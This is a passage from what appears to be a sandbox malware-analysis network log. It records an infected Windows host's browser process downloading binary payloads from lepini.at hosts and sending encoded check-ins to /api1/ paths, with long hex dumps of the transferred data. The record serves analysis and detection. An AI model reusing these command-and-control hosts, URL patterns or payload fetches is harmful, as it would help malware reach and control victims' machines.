2b 3d 61 87 66 d9 92 4f e4 89 7d 86 61 ef 51 5d d3 42 cd a3 47 c6 b7 1f 41 3c 12 f6 d9 31 e4 ca c2 0a c5 94 31 27 af a3 80 db 5e 36 e0 5e 2a ba 87 e2 31 2d d7 40 a8 6b f0 52 f3 4d 48 ae 0a 77 e0 6e 70 c1 d4 03 16 01 59 b2 88 ae ee 8f c6 9e 48 80 a6 5d 8e de 61 6e ef 2b 9d 5f 97 47 10 e2 8a fe 00 5c 2e 85 8a 44 73 5a 1d 48 9a 78 18 cc 7a 9e b5 c1 a0 ae 16 56 79 bf 97 c5 ed b8 86 9e a3 ad de b2 5f db 21 65 04 61 3b 9c ad 38 64 b7 c3 ad b3 42 97 eb a1 3c ed 46 f0 36 ae be 5c 19 c2 50 fc 69 73 02 4d 0c 64 dd 73 79 15 fa 85 7a 95 fa bc 35 9a 00 22 99 19 e6 2e e1 34 1a 49 96 e4 92 75 64 dd b9 a7 1e 64 df c5 27 3c 3b 3f 05 ed 4c a9 6f bb b5 d6 77 3d ee 49 ec 50 b4 eb dd b4 bd 37 a8 52 5e cc da fe 93 81 da f4 fd 76 65 8f 79 f5 c3 1c 69 81 12 2b 54 29 11 35 22 d5 68 43 6e 7b e9 7b 68 2b ed c4 95 a8 45 84 ac c3 ac 38 15 cb af 43 95 f3 81 99 14 a7 6c 42 0a a3 79 2e af a4 c4 81 c1 54 28 67 eb 4d 01 c0 f6 c3 45 c2 16 37 56 90 37 e0 f4 23 90 c6 ed da 3a 33 10 1c 18 90 4d ba d5 a7 48 c6 42 42 83 3e ef 33 e4 d6 19 29 7b 94 ef 83 d2 29 cc 0f 89 59 6d f8 8e c9 be 9d 05 3b dc 6d 19 58 04 a0 39 48 19 93 0b b6 c9 20 3a 6b 76 4e ce 15 61 49 a0 bd 7a b0 34 a5 85 73 0b d3 72 16 af fa 8d 11 89 be e2 23 24 a7 e0 36 c8 c8 b9 0b 5d e8 6d 0c 29 5c de 7c 0a a9 6a 00 30 fe 2f 55 67 50 55 50 dd 43 84 a1 c2 1f f1 12 ef 97 22 13 1f 90 36 e9 df 61 a8 0a c3 4e 38 fa ac ca 1a 92 e7 2a 73 e2 e1 0b 14 44 af d0 e9 bb 07 b2 7d 6f c7 62 06 03 ab 22 3d fd 18 23 1e 44 96 5f b4 31 ab 77 37 5e 0b 67 94 28 69 51 75 2a fb 24 99 47 8d ae ce 9f fb 05 cb c7 6c f7 1b b1 53 f0 23 a5 75 ac 32 dc 84 8d 24 da 1f 33 bc d6 91 10 cf 3c 4a 34 f2 13 4a 0d 3f 92 c6 37 46 f9 6a 02 1f 82 e6 d5 a9 50 46 89 d1 cb e1 41 e1 b5 90 ba ad 24 3a 6f ce 14 a0 9e 4f 0e 4e 1a 91 dd dd 6e 31 45 55 5d 72 1d ed a8 68 51 78 d6 44 f4 b1 0e f1 0e 7f e5 50 c4 47 d7 be 0d bc 46 04 93 af 47 46 93 23 08 5a 70 69 03 c1 3d 2b 57 e7 b4 17 cf 7d e4 43 c9 09 91 eb 2e 68 d1 26 f4 6e a3 bd 73 36 54 b4 ca 74 d9 35 f5 14 22 fb 86 01 b7 bc 49 ad 1f 3d 26 cf b4 3e 4b ee 71 26 50 56 ab 1f 66 73 c1 86 5e Data Ascii: 75fTC&h`%fRzITBF<s'_\\|F7-Q\w:5e!P1{#S/j`k=O\|lWTO#ohl?#g'{4Cr"(<Z25DArg9N^EVGa4O }8\|wpPWNvGyeKQwqKP%SFR+iku5J0~7d-2 fI`V`vs:~+=afO}aQ]BGA<11'^6^1-@kRMHwnpYH]an+_G\.DsZHxzVy_!ea;8dB<F6\PisMdsyz5".4Iudd'<;?Low=IP7R^veyi+T)5"hCn{{h+E8ClBy.T(gME7V7#:3MHBB>3){)Ym;mX9H :kvNaIz4sr#$6]m)\\|j0/UgPUPC"6aN8sD}ob"=#D_1w7^g(iQu*$GlS#u2$3<J4J?7FjPFA$:oONn1EU]rhQxDPGFGF#Zpi=+W}C.h&ns6Tt5"I=&>Kq&PVfs^
Feb 12, 2021 01:48:07.458777905 CET	3531	IN	Data Raw: 10 b7 1c 51 90 44 5d e2 44 92 62 fd 44 61 d4 81 d2 1d 3b bc ac 6b bf 4f e3 f9 24 c4 97 c2 ac d2 f9 ba 79 e2 f6 c3 d1 24 ee 1f 18 b8 fa 82 0a dc df 46 68 f5 a6 52 14 36 0b 62 79 f3 59 0c 79 cf 3e a1 bd 9b 11 ed 13 28 3b 50 01 4e c8 83 2c 40 d4 9e Data Ascii: QD]DbDa;kO$y$FhR6byYy>(;PN,@* ?^R?W>?!wu&kWJ>LE_\GY>]_YWRuu?wU?"*(O\|;Q4KDhtLr(E,9slT+u\g-d%6i['\9r9H5

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49770	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 01:50:10.985950947 CET	3805	OUT	GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Feb 12, 2021 01:50:11.073921919 CET	3807	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 00:50:11 GMT Content-Type: application/octet-stream Content-Length: 138820 Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT Connection: close ETag: "5db6b84e-21e44" Accept-Ranges: bytes Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1 Data Ascii: E~r[f1pwC\|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E_v[R{MMpq9.8G^j\<A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]\|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2\|;GHf.?I63L@+YsX'1mcp{_gTyB!n#TCJw.m!@4db\|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaXSw^BNg'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`\|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI
Feb 12, 2021 01:50:11.073970079 CET	3808	IN	Data Raw: eb f5 88 ab ff 3f 0c 75 18 1b 1d 91 15 83 a6 fd 8b ee e5 bd 0f 48 82 1c 3d 58 61 f7 66 26 f2 73 9c 5e a2 cd 4a 40 a8 52 cb 15 b9 9e 3b df e8 48 53 c5 31 f7 99 29 1a aa 5a 45 ff 53 fe d6 ce f8 d1 52 76 db d2 1d 04 1c 72 03 24 24 ea d3 f6 ed 0b a8 Data Ascii: ?uH=Xaf&s^J@R;HS1)ZESRvr$$tfK[78IZJw5nJX($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8\|ymf&ASxYE6*Vfy
Feb 12, 2021 01:50:11.074007988 CET	3809	IN	Data Raw: 17 e6 e3 36 d0 98 48 92 d6 8c 71 5d 6d 0c b5 89 7b f0 f8 2b 38 6c 87 33 a0 26 18 6c 19 1f b4 dd 6d a8 59 82 27 0f f4 73 73 5a 2b f2 0d 90 05 8d a8 2e f6 c3 62 40 2a 1e 51 7b e4 87 c8 26 68 a9 73 36 f0 f9 2e 79 3b b2 24 df 00 53 a1 ef 92 9a 6c d1 Data Ascii: 6Hq]m{+8l3&lmY'ssZ+.b@*Q{&hs6.y;$SlTNI#1<:'vKS;<x{vYJ0y4oO6,)\|S}P{ZL)%;eG`>yBTpCq`^7BW@O5Y-xkB6L=}
Feb 12, 2021 01:50:11.074083090 CET	3811	IN	Data Raw: e3 dd 38 4b 8e 73 21 eb 8f 06 22 3f 26 6d fe dd 16 d9 84 d9 6d 75 bd aa 6a 7a c4 48 d5 a0 29 cf 64 c2 d0 8a e9 59 26 44 95 5e c8 f4 ee 3e 75 fa f2 90 83 4f b0 03 03 da 2b a5 bf 28 4d 6a 66 36 57 4e 20 38 25 31 09 83 27 80 93 bc 6d ab 43 d9 f3 23 Data Ascii: 8Ks!"?&mmujzH)dY&D^>uO+(Mjf6WN 8%1'mC#U(SLNqv#<[Nf@"Cs \<v=*e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(
Feb 12, 2021 01:50:11.074124098 CET	3812	IN	Data Raw: 96 b4 a8 52 0a 3c cc 5a a8 f6 3d 04 3b 66 9c 68 c0 67 fe ae 92 b8 bb a4 47 48 ec 76 69 69 fe ef 78 5d c3 36 e3 20 41 a3 97 30 c7 15 95 e7 56 6a 89 1f c9 09 d7 97 64 b5 c3 71 95 4b 7f 59 46 03 01 7a 66 6f ae 00 3b 4b e1 d6 3a 1b dd 21 33 78 24 d4 Data Ascii: R<Z=;fhgGHviix]6 A0VjdqKYFzfo;K:!3x$ [OVi<dnDPVv>?(UVnR)$K\,7/@sW+ue(EDe*[Mz{Uial'er^r
Feb 12, 2021 01:50:11.074176073 CET	3814	IN	Data Raw: 8d ca df 11 4f fc 21 25 23 28 d3 8c 54 2b e3 24 ac d8 5f f6 d7 0b 62 74 a2 8c 3a 67 20 ba 28 47 5a 5a 33 e8 16 02 dc 03 3f 52 a8 c0 8d 10 e2 05 5b 66 18 c7 ed 24 1e 6b c5 34 e1 94 1d 95 1d b6 33 62 b1 4f 49 9e 51 82 f1 4f 44 09 41 39 a8 3b 77 63 Data Ascii: O!%#(T+$_bt:g (GZZ3?R[f$k43bOIQODA9;wcHSpd7cQ5@'UFi!S$Z&lcFa<(: #vP\|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21W
Feb 12, 2021 01:50:11.074214935 CET	3815	IN	Data Raw: 09 2f f0 20 e4 26 5b cb d4 cc e5 52 cf db 61 6b 2d 47 ec 69 dd 5e 31 72 29 9d d5 ac fa 55 ae 1b 0d 3c dc 64 67 32 b2 a3 85 c1 e3 48 e0 86 49 8c 9b 60 74 e9 51 c1 19 c6 2b 6d f5 4a 64 2e 07 6a 5e 53 1f 1f 3b ed 0a 0b ce 79 2f 2f 0e 2d 7a c0 6e e1 Data Ascii: / &[Rak-Gi^1r)U<dg2HI`tQ+mJd.j^S;y//-zn5.XR+_6}p{U[%(:]'F9~1me$QaV$;@F/Bs7EO@m+hb0I2qWje6'
Feb 12, 2021 01:50:11.074250937 CET	3816	IN	Data Raw: 7a a1 92 c2 66 9c fa 7f 43 4f 25 10 46 b1 e3 4e ee 61 73 a5 d5 db 2e dd 5d a0 6d f0 3a 12 00 0d a1 64 a0 22 6e ab 5f a2 db 1e f6 88 12 b9 8b 06 29 43 bf a4 21 7e ad 39 3f 44 c0 00 28 bf d4 9c bb 13 10 82 96 aa df 27 b6 2f a2 1d d4 73 54 39 ee 77 Data Ascii: zfCO%FNas.]m:d"n_)C!~9?D('/sT9wQ+V(FIA}DxQ8tl5m[Zo(82]UD0yoSv\:^E'f)kHuX#_.)Yg-FzNZVt?YI{sVL
Feb 12, 2021 01:50:11.074289083 CET	3818	IN	Data Raw: 5e 50 5f 4c e5 c6 31 9a 88 82 ec 6c d8 60 3e fa 75 dd 91 ad 70 ca dc 5f 9b 60 14 dd a7 fe b2 d7 4f f1 c4 60 d2 be 52 f7 0a f8 06 bd 43 ac 27 32 e1 2a b7 25 05 15 9c d6 09 5b 54 6a ae d6 30 23 2a bc ef 40 c4 c3 4a d9 ed 04 7c 6f 42 02 12 cb 05 ed Data Ascii: ^P_L1l`>up_`O`RC'2%[Tj0#@J\|oB+%lZiA-)D}ubR$%5EgDI?'f*=^8[szVr4Y'/4+{D8y^)/}Faf%#Dcn~l;+XmjUgmF}xxKHt
Feb 12, 2021 01:50:11.074353933 CET	3819	IN	Data Raw: 4e 72 9b e7 16 b5 db c8 44 a9 f7 b1 71 65 64 64 60 b1 da 0c 16 8f b8 53 d1 a2 07 c4 2c ce 07 d0 55 a2 ac 93 0a 01 aa a8 21 23 e3 97 b6 bf 91 60 da ad 15 09 b0 d1 eb 48 cd ad 94 47 28 8e bb 58 9a 48 f3 6e 83 e2 8d 01 e1 e8 5f d9 1f 69 c7 21 42 59 Data Ascii: NrDqedd`S,U!#`HG(XHn_i!BY"Rb#Y27)7P="wntU_ ?y]&L=g%Ax} Cr'nv\|&g6wHLTk?N~d>,<AHkPyhv?R
Feb 12, 2021 01:50:11.151784897 CET	3821	IN	Data Raw: 93 85 14 68 47 26 7c 67 39 3f 77 88 de d4 5c 18 30 d0 14 5e de 9a 6b e5 2c 48 b0 5e 3d e3 91 af 57 bc 3d 16 94 7d 2f 2b 88 f1 7d 3b eb e7 ad 0a 9a b3 3e 5a 07 af 45 8e 04 22 7d a2 2c 36 e1 36 62 6f d9 1c 0a bb 93 98 d7 d2 b7 80 73 e6 03 40 9d 41 Data Ascii: hG&\|g9?w\0^k,H^=W=}/+};>ZE"},66bos@AP>}U$2JgNc0eWm\|b^t]}_cI>RUM\B=6mLU#H_*tfx4l?cCFI="4<[@HErLp

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49771	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 01:50:11.123406887 CET	3820	OUT	GET /api1/DuDF5ppGssBEcEr/QV9fVntnhIoMQikVLO/d6hiSYeOV/4dYFGDJikRkXzxb_2BwW/QFQQ_2FlxfAt2qA9o9g/62AD_2B2fmm2iqEcG6vEpj/wjoFULqIWzBtE/kxblvPrR/0YVugCmN_2Bc2j9hBYYHAx9/MHnpC4iz_2/F5oIRFMeoEacrx2cV/NDVPaDtLYLzj/tmzoxSzXTF9/V0uTtxgzD_2FHy/qFYc0FBl_2Bwgx5A9auDk/zR8Z_2FGrqOtQfFe/ortBJ2feUbdJvQH/rb6hSVK_2BoVNgF7mN/65jgIEhh3/dPvzgP_2ByDfnONu1bga/xxZ9XKj_2/B3 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Host: api3.lepini.at
Feb 12, 2021 01:50:11.742741108 CET	3951	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 00:50:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49772	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 01:50:11.879420042 CET	3952	OUT	POST /api1/RIcDr3iQ_2F5HIV/n8436tIkJR8PrSjzuD/qVR2EWMqX/JHao30Cb5Ma6tPeJDvP0/Qpt0UP3yCDsC9Fp5cQv/WC3luav8wdMdeqfAWIs0lT/3HapmLJEH6Sr8/S94_2BZ_/2FhcJtKqyYatNIzqU2kqw4R/i383XEDNfh/7iCEha60plcDi0Gsi/YkbbHV8lpXBQ/om0NF0vi0Aw/RyBEHsBgFlPiJM/CB37HmU2lDcIAsK_2BgfJ/DHyfteBHJ3c0Jp8g/vCwxsQxKg_2FRoX/tZDGwkMH_2FCJ5tFJ3/Imp5riyeK/ktUBEA1N01Clwu/a3KCmmi HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Content-Length: 2 Host: api3.lepini.at
Feb 12, 2021 01:50:11.879429102 CET	3952	OUT	Data Raw: 0d 0a Data Ascii:
Feb 12, 2021 01:50:12.545542955 CET	3952	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 00:50:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 37 63 0d 0a 15 d8 46 f5 7c 65 56 92 42 4d f2 71 1f 17 49 4b 27 8d f1 c1 eb e2 98 6a 73 25 9c 17 22 21 6f 1a 76 33 a1 a6 2d b4 f1 b0 6d 46 b5 55 11 3d 53 9d 0b ee 75 50 6f 02 79 84 13 56 bd f8 46 b8 15 d3 a1 e0 16 c0 ba 4a 42 a2 51 ad c3 ea 62 48 03 9b 1d e6 79 0c 17 cb b6 17 cb 46 d5 25 93 94 e4 c1 bc 47 04 9b 7f 25 4d 66 51 3f f0 74 88 b5 a0 a3 2f 9d 57 a6 4f f0 c4 3a ec f1 99 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 7cF\|eVBMqIK'js%"!ov3-mFU=SuPoyVFJBQbHyF%G%MfQ?t/WO:0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49773	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2021 01:50:12.687797070 CET	3954	OUT	GET /api1/9tgtwLjb0tU0zx/gjkgUIt_2BDAbjs0GmiGf/jGKajlUv_2BCCAvj/GG7iDRArA8IwTDs/umyhHUUFxniPZSwiB1/Esmzl052W/VaAuas8dozcem21MrIfi/9YUq_2BOx3S4HJ73aAi/Vs0wStZxRwr04db1SG2ZhF/SDvfPYnIQuY21/wpQuP8zD/NKJ8gswNFYPlJUNd52s2mHl/F5u4SKY7Sb/kxNMhGHUlS6M7up7O/RKp4_2FZDHjQ/JbZOJmdSxil/58gaA96_2FkxAQ/MNrt1jQAMrd60eL4xAxxk/XtosXkxYrgp_2FaY/c1Ab0uIAwuv/A HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Host: api3.lepini.at
Feb 12, 2021 01:50:13.136847973 CET	3955	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 12 Feb 2021 00:50:13 GMT Content-Type: application/octet-stream Content-Length: 332352 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: attachment; filename="6025d0c50bc0e.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 39 ca 6c 8b d4 2b b2 18 d8 61 84 81 bc dc e9 0f 71 70 85 cf 81 4d 45 1e b5 74 4b 27 5a 80 84 1b 65 24 9e de 44 6e 92 97 c9 a4 ae 85 6c a8 32 ce 2b 5a 15 44 30 a1 ab 32 d5 fe f4 f5 a6 f8 b4 21 c1 0e d1 b7 5a 35 a5 e4 1a 3e e1 bd c2 da d0 c1 4f 82 41 bd 9a 35 4a 36 4a 7c e9 de ff 90 c8 a9 79 33 86 df ee 15 77 ab b3 17 6a 56 30 b0 f0 46 b5 34 47 53 88 ad ae 29 1f 00 f9 ea 59 9c 80 af 2f 59 33 80 33 99 27 f7 3a c4 38 6f 94 96 c0 ef 1d 54 ff a8 8b 40 30 c9 84 5a e7 52 62 4a 23 8b 77 3c c1 b3 17 7c ca 01 03 41 63 f6 3f 33 b3 55 d0 19 42 45 99 7b 0d aa b1 65 18 95 54 64 e7 6f a9 79 27 6e e8 cc 7b 65 56 0d 57 11 a6 2c 1c 7a 7e e0 f9 8b 80 03 22 a3 fe d4 b5 cf 39 7a 83 35 01 5f ea 14 d4 d3 6b 86 59 be 0f a8 64 82 68 d0 0c 19 38 5c b2 e3 d9 1c cc 0c 29 3e fc 28 9e e5 95 1d 00 81 33 3d a1 ce 67 1b 8a 64 aa 13 fa b8 84 51 99 0c 12 92 43 f8 7c 4a 4b 8b 54 24 a0 ea d9 9a 3a 23 ee fd 4e c4 2e 92 28 bf 7e 44 7c 50 2e de af d6 4a d6 d8 68 c0 10 28 c3 49 83 93 da 4b fe 75 35 4e 5c ee a7 43 2d 2e cc ae 3a a4 e5 21 32 3f d6 7f 8d e7 60 5a a9 1d 75 28 6f 2a 78 c9 a2 bd 2f 9b 2c 71 71 5b 3f d9 fb 8e 49 7c 76 72 50 ad f9 02 77 c8 ca c7 07 c3 9a e8 ff 35 47 21 61 12 fd 4b a7 a5 21 02 3b d8 0a 82 70 57 dc d2 14 5a 30 55 a5 46 87 fe 18 9a 88 bf e6 f7 81 56 70 2c e7 4a 38 9b 7e ed f5 af 0b 99 32 22 1b 62 4d 41 41 4b 41 9a e4 59 d8 b7 e7 64 44 e7 16 ef 3b 18 be 13 61 be 4f 71 9c 8f 2c 1c 60 d3 aa ee 94 a3 1e 43 6c 61 42 76 39 58 c0 3c a1 9e 64 07 c8 f9 f0 44 06 c1 56 97 31 02 95 40 b7 c9 db 9a 72 67 80 a8 bf 2b 03 b7 a5 1c 15 56 11 8a a8 e0 d3 26 81 f9 76 9b 1b ba f0 d7 66 a2 8d 43 19 eb e3 00 27 4d ee b6 28 20 ba ab c2 42 53 9f d3 ef 6d c4 52 01 6c 8e 32 68 af 49 4c 1e 4c 78 3a 05 46 93 8c a2 6b e6 4d ed ac 1d 57 f4 e2 2c c0 b6 7e 84 ec dd 93 18 48 86 e9 c4 77 9d 36 14 0e ca 93 dc 14 df 7b 2f 78 85 52 f4 2e 97 ca 90 24 52 35 2c fe 48 01 ad 84 36 70 6b 4c 4a c9 98 22 5f b9 9e 57 da b4 55 97 cd 1c 85 f9 c6 19 ae a7 db 19 df b9 e8 cd e7 92 e4 fa 38 b4 e2 c0 43 af bc 8b 75 8c 9b 88 4f 21 cd ed e2 c8 25 e4 ec cd 15 7a 78 69 d2 05 79 8c ac 47 b2 0c f6 a3 76 71 7c 91 c0 6b 55 2d 1b 0f 54 0c df c8 f5 ed ea e7 3d 42 f9 15 53 51 db 58 5e ce 71 98 71 53 9a e4 c2 4b 15 0b 66 0e ce 04 e0 e3 db 6c 95 04 d5 b9 c2 c5 32 d6 57 ea 69 5c 41 40 a5 bd 6c 64 9e 16 29 2d e3 7f 95 22 d9 9e b9 01 02 21 99 c6 e2 f7 af a8 04 b5 29 f5 49 1a 2a 51 b4 96 3d 2e 68 e9 73 da fc f9 4d 74 fc 4a 8b c0 d1 9c ff ef fb 0b 7f 64 7c 63 4f 12 86 71 7d b6 2a d1 ed 99 91 4c f2 f2 a5 19 81 07 b1 d3 b3 09 46 5c cc 24 52 af 58 04 f2 82 d0 ad 83 ff 14 73 ac ca 89 1b d5 d1 e6 8d 6b da 8e af da db 30 4b 49 d2 4a 93 17 ba 88 fd ed c3 11 37 be 40 85 d7 d1 1a 2f 3b 06 2d 46 6b 44 e3 35 b5 32 18 d5 fb 5a 1e 78 7b 28 bb 46 ca a2 ff 9b 06 71 ac 9a f2 1e a1 d3 14 d4 60 11 32 e4 Data Ascii: 9l+aqpMEtK'Ze$Dnl2+ZD02!Z5>OA5J6J\|y3wjV0F4GS)Y/Y33':8oT@0ZRbJ#w<\|Ac?3UBE{eTdoy'n{eVW,z~"9z5_kYdh8\)>(3=gdQC\|JKT$:#N.(~D\|P.Jh(IKu5N\C-.:!2?`Zu(ox/,qq[?I\|vrPw5G!aK!;pWZ0UFVp,J8~2"bMAAKAYdD;aOq,`ClaBv9X<dDV1@rg+V&vfC'M( BSmRl2hILLx:FkMW,~Hw6{/xR.$R5,H6pkLJ"_WU8CuO!%zxiyGvq\|kU-T=BSQX^qqSKfl2Wi\A@ld)-"!)IQ=.hsMtJd\|cOq}*LF\$RXsk0KIJ7@/;-FkD52Zx{(Fq`2
Feb 12, 2021 01:50:13.136907101 CET	3956	IN	Data Raw: 3a 45 d6 69 be 22 b0 82 58 7c 18 60 d3 80 61 ec b4 c3 06 b6 14 77 95 55 df 07 0c 5f 0c 62 88 07 ab de e1 bb 44 b5 dc 4b 63 65 7b 65 06 5a 5b 20 33 74 eb c5 73 c6 9d 3d c0 79 b9 7e 55 c3 95 2c 4b 05 53 d0 fd 9a 31 08 de a6 bf 3c 5f 37 02 fa 5b 9c Data Ascii: :Ei"X\|`awU_bDKce{eZ[ 3ts=y~U,KS1<_7[1#Ck9~]ChJ4e_D"$?Xp;G$Xx<GO*D(LOP[Nrz~H1eT]5m[}w4mhCknFc$lE'Q0);$
